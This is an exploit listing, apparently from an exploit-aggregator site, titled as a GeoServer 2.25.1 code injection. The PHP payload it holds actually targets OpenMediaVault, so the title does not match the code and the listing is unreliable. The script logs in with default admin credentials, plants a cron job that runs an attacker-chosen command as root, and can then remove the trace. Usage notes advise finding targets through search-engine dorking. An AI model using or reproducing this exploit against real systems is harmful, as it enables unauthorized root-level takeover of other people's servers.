Share
## https://sploitus.com/exploit?id=PACKETSTORM:182018
=============================================================================================================================================
| # Title : GeoServer 2.25.1 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://github.com/geoserver/ |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] uses the CURL to Allow remote command .
[+] Line 118 set your target .
[+] Line 123 set your command to execute.
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php
[+] PayLoad :
<?php
class OpenMediaVaultExploit
{
private $targetUri;
private $username;
private $password;
private $persistent;
private $cronUuid;
private $versionNumber;
public function __construct($targetUri, $username, $password, $persistent = false)
{
$this->targetUri = $targetUri;
$this->username = $username;
$this->password = $password;
$this->persistent = $persistent;
}
private function sendRequest($url, $data)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/json'
]);
$response = curl_exec($ch);
curl_close($ch);
return json_decode($response, true);
}
public function login()
{
echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n";
$data = [
'service' => 'Session',
'method' => 'login',
'params' => [
'username' => $this->username,
'password' => $this->password
],
'options' => null
];
$response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
return isset($response['authenticated']) && $response['authenticated'] === true;
}
public function checkTarget()
{
echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n";
$data = [
'service' => 'System',
'method' => 'getInformation',
'params' => null
];
$response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
return $response;
}
public function checkVersion($response)
{
if (!empty($response)) {
$version = $response['response']['version'] ?? null;
return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null;
}
return null;
}
public function executeCommand($cmd)
{
echo "Executing command...\n";
$schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*';
$uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4';
$data = [
'service' => 'Cron',
'method' => 'set',
'params' => [
'uuid' => $uuid,
'enable' => true,
'execution' => 'exactly',
'minute' => $schedule,
'hour' => $schedule,
'dayofmonth' => $schedule,
'month' => $schedule,
'dayofweek' => $schedule,
'username' => 'root',
'command' => $cmd,
'sendemail' => false,
'comment' => '',
'type' => 'userdefined'
],
'options' => null
];
$response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
$this->cronUuid = $response['response']['uuid'] ?? '';
$this->applyConfigChanges();
echo "Cron payload execution triggered.\n";
}
public function applyConfigChanges()
{
$data = [
'service' => 'Config',
'method' => 'applyChangesBg',
'params' => [
'modules' => [],
'force' => false
],
'options' => null
];
$this->sendRequest($this->targetUri . '/rpc.php', $data);
}
public function removePayload()
{
if (!$this->persistent) {
$data = [
'service' => 'Cron',
'method' => 'delete',
'params' => [
'uuid' => $this->cronUuid
]
];
$response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
if ($response) {
$this->applyConfigChanges();
echo "Cron payload entry successfully removed.\n";
} else {
echo "Cannot access cron services to remove payload.\n";
}
}
}
}
// Usage
$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);
if ($exploit->login()) {
$response = $exploit->checkTarget();
if ($response) {
$exploit->versionNumber = $exploit->checkVersion($response);
$exploit->executeCommand('your-command-here');
$exploit->removePayload();
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================